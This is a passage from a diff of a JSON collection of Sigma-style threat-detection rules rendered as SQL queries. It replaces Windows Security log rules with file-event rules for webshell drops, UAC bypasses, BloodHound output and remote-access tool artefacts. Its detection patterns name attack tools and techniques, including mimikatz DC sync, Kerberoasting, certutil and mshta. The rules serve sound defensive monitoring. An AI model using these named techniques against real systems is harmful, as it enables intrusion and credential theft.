'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical 
support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Executable 
File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", - "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], 
"falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - 
"title": "Login with WMI", - "id": "5af54681-df95-4c26-854f-2565e13cfab0", - "status": "stable", - "description": "Detection of logins performed with WMI", - "author": "Thomas Patzke", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Monitoring tools", - "Legitimate system administration" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_wmi_login.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564" ], "falsepositives": [ "Unknown" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "status": "experimental", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Some false positives may arise in some environment and this may require some tuning. 
Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "UAC 
Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" - ], - 
"filename": "win_security_susp_rottenpotato.yml" - }, - { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Intended inclusions by administrator" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": 
"Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Weak 
Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE 
'\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts 